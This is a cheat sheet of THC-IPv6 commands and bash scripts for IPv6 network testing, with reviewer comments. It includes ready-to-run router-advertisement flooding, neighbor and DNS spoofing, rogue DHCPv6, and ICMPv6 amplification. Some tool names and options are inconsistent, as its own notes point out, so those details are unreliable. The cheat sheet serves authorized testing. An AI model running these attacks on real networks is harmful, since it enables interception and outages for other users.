
THC-IPv6

THC-IPv6 is a comprehensive toolkit for IPv6 network security testing and vulnerability assessment. It provides advanced tools for IPv6 reconnaissance, neighbor discovery manipulation, address scanning, and exploit delivery. This toolkit is essential for authorized security professionals testing IPv6 network implementations, identifying configuration weaknesses, and validating security controls in modern dual-stack environments.

# Install THC-IPv6 from source on a Debian/Ubuntu host (apt-get). Two
# alternative routes follow: a git clone, then a release tarball.

# Required packages
sudo apt-get update
sudo apt-get install build-essential libpcap-dev libssl-dev

# Git for cloning
sudo apt-get install git
# NOTE(review): the clone takes whatever the default branch holds at that
# moment. Check out a reviewed tag or commit before `sudo make install`, so the
# code that runs as root is the code that was inspected.
git clone https://github.com/vanhauser-thc/thc-ipv6.git
cd thc-ipv6

# Build toolkit
make

# Install globally (optional)
sudo make install
# Download source
# NOTE(review): nothing below verifies the archive before it is built and
# installed as root. Compare `sha256sum thc-ipv6-3.8.tar.gz` with a digest or
# signature published by the project (<PUBLISHED_SHA256>, placeholder) first.
wget https://www.thc.org/thc-ipv6-3.8.tar.gz
tar -xzf thc-ipv6-3.8.tar.gz
# NOTE(review): confirm the directory name the archive unpacks to;
# `tar -tzf thc-ipv6-3.8.tar.gz` lists it without extracting.
cd thc-ipv6

# Compile
# NOTE(review): the git route above builds with `make` alone; confirm that the
# tarball actually ships a configure script.
./configure
make
sudo make install
# List available tools
# NOTE(review): every other example on this page invokes the tools as ./alive6,
# ./address-scan, ... without a thc-ipv6- prefix; confirm which naming the
# build produces.
ls thc-ipv6-*

# Check specific tool
./thc-ipv6-address-scan --help
| Tool | Function |
|---|---|
| address-scan | IPv6 address scanning and discovery |
| alive6 | Detect alive IPv6 hosts |
| dnsdict6 | DNS enumeration for IPv6 |
| dnsspoofx | IPv6 DNS spoofing |
| fake-advertise6 | Router advertisement spoofing |
| flood-router6 | Router advertisement flooding |
| nd6 | Neighbor discovery manipulation |
| packetgen6 | Custom IPv6 packet generation |
| rsmurf6 | Reflection DDoS testing |
| smurf6 | IPv6 ICMP amplification |
| toobig6 | Fragmentation bomb attacks |
# Host, address and DNS discovery examples. 2001:db8::/32 in these commands is
# the documentation prefix reserved by RFC 3849; substitute the in-scope prefix.

# Scan local network for IPv6
./alive6 eth0

# Scan specific range
# fe80::/10 is the link-local range, so this stays on the segment attached to eth0.
./alive6 -p eth0 fe80::/10

# Output to file
# The redirect overwrites hosts.txt on every run.
./alive6 eth0 > hosts.txt
# Scan IPv6 address range
# A /32 holds 2^96 addresses. NOTE(review): the page does not say how
# address-scan bounds the sweep; confirm its strategy before timing a run.
./address-scan eth0 2001:db8::/32

# Fast scan mode
./address-scan -s eth0 2001:db8::/32

# Verbose output
./address-scan -v eth0 2001:db8::/32

# Save results
./address-scan eth0 2001:db8::/32 > ipv6_addresses.txt
# Enumerate IPv6 DNS records
# Detection: dictionary enumeration presumably shows up as a burst of lookups
# for many labels under one zone in resolver or authoritative server logs.
./dnsdict6 -d example.com

# Use wordlist
# NOTE(review): this form passes the domain positionally while the line above
# uses -d; confirm which form the tool accepts.
./dnsdict6 -w wordlist.txt example.com

# Reverse DNS lookup
./dnsdict6 -i 2001:db8::/32

# Full scan mode
./dnsdict6 -f -d example.com
| Scan Type | Command |
|---|---|
| Active scan | address-scan eth0 range |
| Alive detection | alive6 eth0 |
| DNS enumeration | dnsdict6 -d domain |
| Reverse lookup | dnsdict6 -i range |
# Neighbor Discovery, Router Advertisement and Duplicate Address Detection test
# traffic for the segment attached to eth0.
# Controls these exercise: RA Guard (RFC 6105) and ND inspection on access
# switch ports; on Linux hosts, net.ipv6.conf.<iface>.accept_ra.

# Send neighbor discovery packets
./nd6 -i fe80::1 eth0 2001:db8::1

# Solicitation injection
./nd6 -ns eth0 2001:db8::/64

# Advertisement injection
./nd6 -na eth0 2001:db8::/64
# Fake router advertisement
./fake-advertise6 eth0 2001:db8::/64

# Flood network with RA
# NOTE(review): no duration limit here; another example on this page wraps the
# same tool in `timeout 60`.
./flood-router6 eth0

# Router advertisement with payload
./fake-advertise6 -e eth0 2001:db8::/64
# Test DAD mechanism
./nd6 -dad eth0 2001:db8::1

# Verify DAD responses
# NOTE(review): alive6's output format is not shown on this page; confirm that
# it ever prints the word "duplicate" before treating an empty grep result as a
# pass. `grep` exits 1 when nothing matches.
./alive6 eth0 | grep -i "duplicate"
| Attack | Command |
|---|---|
| Neighbor spoofing | ./nd6 -i |
| Router advertisement | ./fake-advertise6 |
| RA flooding | ./flood-router6 |
| Address conflict | ./nd6 -dad |
# ICMPv6 behaviour tests: echo amplification, Packet Too Big handling and
# redirects. target_ipv6 is a placeholder for the address under test.
# Reference for the filtering side: RFC 4890 (ICMPv6 filtering in firewalls).

# Test ICMP echo amplification
./smurf6 eth0 target_ipv6

# Multicast amplification
./smurf6 -m eth0 2001:db8::1

# Verify amplification potential
# ff02::1 is the link-local all-nodes multicast group, so every host on the
# segment may answer this probe.
./alive6 eth0 ff02::1
# Send oversized packets
./toobig6 -H eth0 target_ipv6

# Fragment reassembly test
./toobig6 eth0 2001:db8::1

# Heap overflow test
# NOTE(review): the page never explains -s or this label; check the tool's own
# usage text for what the option does.
./toobig6 -s eth0 2001:db8::1
# Send ICMPv6 redirect
# Mitigation: Linux hosts ignore redirects when
# net.ipv6.conf.<iface>.accept_redirects is 0.
./redirect6 eth0 2001:db8::1 2001:db8::2

# Gateway manipulation
./fake-router6 -r eth0 2001:db8::/64
| ICMP Attack | Command |
|---|---|
| Smurf attack | ./smurf6 eth0 target |
| TooBig attack | ./toobig6 eth0 target |
| Redirect | ./redirect6 eth0 target gate |
# Packet crafting, DNS spoofing and rogue DHCPv6 examples, followed by a
# five-step discovery workflow. All addresses are from the 2001:db8::/32
# documentation prefix and example.com is a reserved example domain.

# Generate custom IPv6 packet
./packetgen6 eth0 \
  --src 2001:db8::1 \
  --dst 2001:db8::2 \
  --proto tcp \
  --payload "test"

# Raw packet crafting
./sendpkt6 eth0 2001:db8::1 2001:db8::2
# ICMPv6 packet
# NOTE(review): the protocol is selected with `--proto tcp` above and with
# --icmpv6 / --tcp / --udp below; confirm which spelling the tool accepts.
./packetgen6 eth0 --icmpv6 --type echo-request

# TCP packet
./packetgen6 eth0 --tcp --port 80

# UDP packet
./packetgen6 eth0 --udp --port 53
# Start DNS spoof server
# Control under test: clients behind a DNSSEC-validating resolver should reject
# forged answers for signed zones.
./dnsspoofx eth0 example.com 2001:db8::1

# Targeted DNS poison
./dnsspoofx -t 2001:db8::100 eth0 example.com 2001:db8::1

# Wildcard DNS spoofing
# The single quotes keep the shell from expanding the * as a filename pattern.
./dnsspoofx eth0 '*.example.com' 2001:db8::1
# Send rogue DHCPv6 server
# Control under test: DHCPv6-Shield (RFC 7610) / DHCPv6 guard on switch ports.
./fake-dhcp6 eth0 2001:db8::/64

# DHCPv6 information request
./fake-dhcp6 -i eth0 2001:db8::1
# 1. Detect IPv6 hosts
./alive6 eth0

# 2. Enumerate addresses in range
./address-scan eth0 2001:db8::/32

# 3. Scan for DNS entries
./dnsdict6 -d example.com

# 4. Test neighbor discovery
./nd6 -i fe80::1 eth0 2001:db8::1

# 5. Check ICMP behavior
./alive6 eth0 ff02::1
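#!/bin/bash
# Phased IPv6 assessment: host discovery, address enumeration, DNS enumeration,
# then a time-boxed router-advertisement flood. Output files are written to the
# current directory and overwritten on each run.
set -u

INTERFACE="eth0"
TARGET_RANGE="2001:db8::/32"   # documentation prefix (RFC 3849); set to the in-scope range
TARGET_DOMAIN="example.com"
FLOOD_SECONDS=10

flood_pid=""

# Stop the background flood started in phase 4. Registered on EXIT so that an
# interrupted or failed run cannot leave the flood running on the segment.
stop_flood() {
  if [[ -n "$flood_pid" ]]; then
    kill "$flood_pid" 2>/dev/null
    wait "$flood_pid" 2>/dev/null
    flood_pid=""
  fi
}
trap stop_flood EXIT
trap 'exit 130' INT TERM

echo "[*] Starting IPv6 security assessment..."

# Phase 1: Discovery
echo "[*] Phase 1: Host Discovery"
./alive6 "$INTERFACE" > hosts.txt

# Phase 2: Address Enumeration
echo "[*] Phase 2: Address Enumeration"
./address-scan "$INTERFACE" "$TARGET_RANGE" > addresses.txt

# Phase 3: DNS Enumeration
echo "[*] Phase 3: DNS Enumeration"
./dnsdict6 -d "$TARGET_DOMAIN" > dns_results.txt

# Phase 4: Vulnerability Testing
echo "[*] Phase 4: Vulnerability Testing"
# Test RA floods. The flood is stopped through the PID recorded here rather
# than with `pkill -f`, which matches on full command lines and would also
# signal any other process whose arguments mention "flood-router6".
./flood-router6 "$INTERFACE" &
flood_pid=$!
sleep "$FLOOD_SECONDS"
stop_flood

# Phase 5: Reporting
echo "[*] Assessment Complete"
echo "Results saved to: hosts.txt, addresses.txt, dns_results.txt"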
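# Time-boxed stress tests. Every long-running tool is bounded with `timeout`
# so that it ends even if the surrounding shell is interrupted.

# Router advertisement flood (controlled)
timeout 60 ./flood-router6 eth0

# ICMPv6 amplification (test environment)
# Bounded with `timeout`, like the flood above, instead of a background job
# followed by `pkill -f "smurf6"`: pkill -f matches full command lines, so it
# would also signal unrelated processes that mention smurf6, and an interrupted
# `sleep` would leave the job running.
timeout 30 ./smurf6 eth0 target_ipv6

# Fragmentation bomb
# NOTE(review): no time limit here; confirm that toobig6 exits by itself or
# wrap it in `timeout` as well.
./toobig6 eth0 target_ipv6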
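#!/bin/bash
# Sends four kinds of IPv6 test traffic to exercise RA Guard, ICMPv6 rate
# limiting, Duplicate Address Detection and ND inspection.
# Usage: <script> [interface]   (interface defaults to eth0)
#
# The script only generates the traffic. None of the steps reads back a
# verdict, so the outcome of each test has to be observed on the switch or on a
# client host in the segment.
set -u

INTERFACE="${1:-eth0}"
TEST_PREFIX="2001:db8::/64"   # documentation prefix (RFC 3849)
# The earlier value "2001:db8::test" is not a valid IPv6 address ("t" and "s"
# are not hexadecimal digits); use the address the page's other DAD example uses.
DAD_ADDRESS="2001:db8::1"

echo "[*] IPv6 Security Validation"

# Test 1: Router Advertisement Guard
echo "[Test 1] Testing Router Advertisement Guard..."
./fake-advertise6 "$INTERFACE" "$TEST_PREFIX"

# Test 2: ICMP Rate Limiting
echo "[Test 2] Testing ICMP Rate Limiting..."
./alive6 -R "$INTERFACE" | head -20

# Test 3: DAD Functionality
echo "[Test 3] Duplicate Address Detection..."
./nd6 -dad "$INTERFACE" "$DAD_ADDRESS"

# Test 4: ND Inspection
echo "[Test 4] Neighbor Discovery Inspection..."
# The prefix argument matches the page's standalone example
# (`./nd6 -ns eth0 2001:db8::/64`); the call previously had no target at all.
./nd6 -ns "$INTERFACE" "$TEST_PREFIX"

echo "[*] Validation Complete"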
# Redirect, rogue Router Advertisement and neighbor-spoofing examples.
# target_ipv6 and gateway_ipv6 are placeholders.

# Configure forwarding
# `sysctl -w` changes the running kernel only, and nothing below turns
# forwarding off again: it stays on until it is set back to 0 or the host
# reboots.
sudo sysctl -w net.ipv6.conf.all.forwarding=1

# Send redirect packets
# Mitigation: Linux hosts ignore redirects when
# net.ipv6.conf.<iface>.accept_redirects is 0.
./redirect6 eth0 target_ipv6 gateway_ipv6

# Monitor traffic
# Runs in the foreground until interrupted. The icmpv6 filter covers redirects,
# RAs and neighbor discovery, so the same capture is what a defender would use
# to spot these tests on a segment.
tcpdump -i eth0 -n icmpv6
# Send malicious RA
# NOTE(review): this call uses long options with the interface last, while
# every other fake-advertise6 example on the page is `<iface> <prefix>`;
# confirm which form the tool accepts.
./fake-advertise6 \
  --prefix 2001:db8::/64 \
  --lifetime 3600 \
  --mtu 1280 \
  eth0

# Persistent RA generation
# The loop has no exit condition; it runs until it is interrupted.
# Mitigation: RA Guard (RFC 6105) on switch ports; hosts that must not
# autoconfigure can set net.ipv6.conf.<iface>.accept_ra=0.
while true; do
  ./fake-advertise6 eth0 2001:db8::/64
  sleep 10
done
# ARP-equivalent for IPv6
./nd6 -i fe80::1 eth0 2001:db8::1

# Multiple spoofed neighbors
# Each nd6 is started in the background and is never waited on or killed, so
# ten processes keep running after the loop returns unless the tool exits by
# itself.
for i in {1..10}; do
  ./nd6 -i fe80::$i eth0 2001:db8::$i &
done
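#!/bin/bash
# Runs host discovery, address enumeration and (optionally) DNS enumeration,
# then writes the raw output and a short summary into a timestamped directory.
#
# Usage: <script> <target-network> [interface] [dns-domain]
#   target-network  IPv6 prefix to enumerate (required)
#   interface       network interface to send from (default: eth0)
#   dns-domain      domain for DNS enumeration; the step is skipped when absent
set -u

if [[ -z "${1:-}" ]]; then
  printf 'Usage: %s <target-network> [interface] [dns-domain]\n' "${0##*/}" >&2
  exit 2
fi

TARGET_NETWORK=$1
INTERFACE=${2:-eth0}
DNS_DOMAIN=${3:-}
OUTPUT_DIR="ipv6_scan_$(date +%Y%m%d_%H%M%S)"

# Findings are sensitive: create the directory and every file in it readable by
# the current user only.
umask 077
if ! mkdir -p "$OUTPUT_DIR"; then
  echo "[!] Cannot create output directory: $OUTPUT_DIR" >&2
  exit 1
fi

echo "[*] IPv6 Comprehensive Scan"
echo "[*] Network: $TARGET_NETWORK"
echo "[*] Interface: $INTERFACE"
echo "[*] Output: $OUTPUT_DIR"

# Host discovery
./alive6 "$INTERFACE" > "$OUTPUT_DIR/alive_hosts.txt"

# Address enumeration
./address-scan "$INTERFACE" "$TARGET_NETWORK" > "$OUTPUT_DIR/all_addresses.txt"

# DNS enumeration
# The domain used to be built from the first two groups of the prefix plus
# ".org" (2001:db8::/32 became "2001:db8.org"). That is not a name related to
# the target, so the queries went to whatever that string resolves as. The
# domain is now an explicit argument and the step is skipped without it.
if [[ -n "$DNS_DOMAIN" ]]; then
  ./dnsdict6 -d "$DNS_DOMAIN" > "$OUTPUT_DIR/dns_records.txt"
else
  echo "[*] No DNS domain given; skipping DNS enumeration"
  : > "$OUTPUT_DIR/dns_records.txt"
fi

# Generate report
cat > "$OUTPUT_DIR/report.txt" << EOF
IPv6 Security Assessment Report
Generated: $(date)
Target Network: $TARGET_NETWORK
Interface: $INTERFACE
DNS Domain: ${DNS_DOMAIN:-not provided (DNS enumeration skipped)}

Findings:
- Alive hosts: $(wc -l < "$OUTPUT_DIR/alive_hosts.txt")
- Total addresses: $(wc -l < "$OUTPUT_DIR/all_addresses.txt")
- DNS entries: $(wc -l < "$OUTPUT_DIR/dns_records.txt")
EOF

echo "[*] Scan complete. Results in: $OUTPUT_DIR"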
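#!/bin/bash
# Sends four kinds of IPv6 test traffic on one interface: a router
# advertisement, repeated host discovery, a neighbor discovery message and a
# DNS enumeration.
# Usage: <script> <interface>
#
# A tool's exit status says whether the tool ran, not whether a control in the
# network blocked its traffic, so the messages below report what was sent and
# where to look for the effect.
set -u

INTERFACE=${1:-}
if [[ -z "$INTERFACE" ]]; then
  printf 'Usage: %s <interface>\n' "${0##*/}" >&2
  exit 2
fi

# Run one probe with its stderr discarded, and report a non-zero exit status so
# that a probe which could not run (missing privileges, unknown interface) is
# not mistaken for a completed test.
# Arguments: $1 - label for messages; remaining arguments - command to run
# Returns:   the command's exit status
run_probe() {
  local label=$1
  shift
  local rc=0
  "$@" 2>/dev/null || rc=$?
  if (( rc != 0 )); then
    echo "[!] $label: '$1' exited with status $rc; probe did not run to completion" >&2
  fi
  return "$rc"
}

echo "[*] IPv6 Vulnerability Detection"

# Test 1: RA Guard bypass
echo "[Test 1] Router Advertisement Guard..."
# Exit status 0 used to be reported as "RA Guard may be bypassed", but it only
# means the advertisement was sent. Whether it got through is visible on a
# client in the segment.
if run_probe "Test 1" ./fake-advertise6 "$INTERFACE" 2001:db8::/64; then
  echo "[Test 1] RA sent. Check a client on the segment ('ip -6 addr', 'ip -6 route') for 2001:db8::/64: present means the RA passed RA Guard, absent means it was dropped."
fi

# Test 2: ICMP rate limiting
echo "[Test 2] ICMP Rate Limiting..."
failed=0
SECONDS=0
for i in {1..100}; do
  ./alive6 "$INTERFACE" > /dev/null 2>&1 || failed=$((failed + 1))
done
echo "[Test 2] 100 discovery runs in ${SECONDS}s, $failed exited non-zero. Compare ICMPv6 counters on the target before and after to judge rate limiting."

# Test 3: Neighbor Discovery security
echo "[Test 3] Neighbor Discovery Security..."
run_probe "Test 3" ./nd6 -i fe80::ffff "$INTERFACE" 2001:db8::1

# Test 4: DNS security
# The page lists dnsdict6 as a DNS enumeration tool and nothing here checks
# DNSSEC signatures, so the step is labelled as what it does.
echo "[Test 4] DNS Enumeration..."
run_probe "Test 4" ./dnsdict6 -d example.com

echo "[*] Testing complete"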
# Deployment checks, inventory and security-control tests, grouped as on the
# page. 2001:db8::/32 is the documentation prefix (RFC 3849) and example.com a
# reserved example domain.

# Verify IPv6 is enabled
./alive6 eth0

# Check address assignment
# ::/0 is the whole IPv6 address space. NOTE(review): a sweep of it cannot act
# as a check of local address assignment; `ip -6 addr show dev eth0` reads the
# assigned addresses directly.
./address-scan eth0 ::/0

# Validate AAAA records
./dnsdict6 -d example.com

# Test dual-stack routing
./packetgen6 eth0 --icmpv6
# Discover all devices
# alive6 is run against the local interface, so the list presumably covers the
# attached segment only.
./alive6 eth0 > network_devices.txt

# Map IPv6 topology
./address-scan eth0 2001:db8::/32 > ipv6_topology.txt

# Document DNS infrastructure
./dnsdict6 -d example.com > dns_infrastructure.txt
# Test RA Guard
# Control under test: RA Guard (RFC 6105). The result is read on a client or on
# the switch, not from this command.
./fake-advertise6 eth0 2001:db8::/64

# Test ICMP filtering
./alive6 eth0 ff02::1

# Test DHCP snooping
# Control under test: DHCPv6-Shield (RFC 7610) / DHCPv6 guard.
./fake-dhcp6 eth0 2001:db8::/64

# Verify firewall rules
# NOTE(review): no destination is given and only TCP port 22 is probed, so this
# exercises at most one rule; confirm the intended target and port list.
./packetgen6 eth0 --tcp --port 22
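# Troubleshooting "command not found": locate the build directory and make the
# tools reachable.

# Check installation directory
ls -la thc-ipv6-*/

# Add to PATH
# A glob is not expanded inside an assignment, so
# `export PATH=$PATH:$(pwd)/thc-ipv6-*` puts the literal text "thc-ipv6-*" on
# PATH and adds no usable directory. Resolve one real directory instead and
# append it as an absolute path, after the system directories.
for tool_dir in "$(pwd)"/thc-ipv6-*/; do
  if [ -d "$tool_dir" ]; then
    export PATH="$PATH:${tool_dir%/}"
    break
  fi
done
unset tool_dir

# Or use full path
# NOTE(review): ::/0 is the whole IPv6 address space; use a prefix that is in
# scope when checking that the binary starts.
./thc-ipv6-address-scan eth0 ::/0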
# Troubleshooting: permissions, interface state and slow scans.

# Most tools require raw socket access
sudo ./alive6 eth0

# Or use setcap
# A file capability applies to whoever can execute the file: after this, any
# local user with execute permission on ./address-scan gets raw-socket access
# without sudo. `getcap ./address-scan` shows the grant and
# `sudo setcap -r ./address-scan` removes it.
sudo setcap cap_net_raw+ep ./address-scan
# Verify interface
ip -6 link show

# Check IPv6 is enabled
# Prints 0 when IPv6 is enabled and 1 when it is disabled.
cat /proc/sys/net/ipv6/conf/all/disable_ipv6

# Enable IPv6 if needed
# `sysctl -w` changes the running kernel only; the setting does not survive a
# reboot.
sudo sysctl -w net.ipv6.conf.all.disable_ipv6=0
# Use fast scan mode where available
./address-scan -s eth0 2001:db8::/32

# Reduce scope
./address-scan eth0 2001:db8:1::/48  # Smaller range

# Increase timeout
# NOTE(review): the unit of the -T value is not stated on this page.
./alive6 -T 2 eth0
  • Ensure written authorization before testing
  • Document all testing activities
  • Follow responsible disclosure
  • Maintain confidentiality of findings
# Test in controlled environment
# Use isolated network segments
# Limit test scope and duration
# Monitor for unintended impacts
# Have rollback procedures ready
  • Wireshark — IPv6 packet analysis
  • Zeek — IPv6 network monitoring
  • Suricata — IPv6 intrusion detection
  • scapy — Python IPv6 packet crafting
  • hping3 — IPv6 packet generator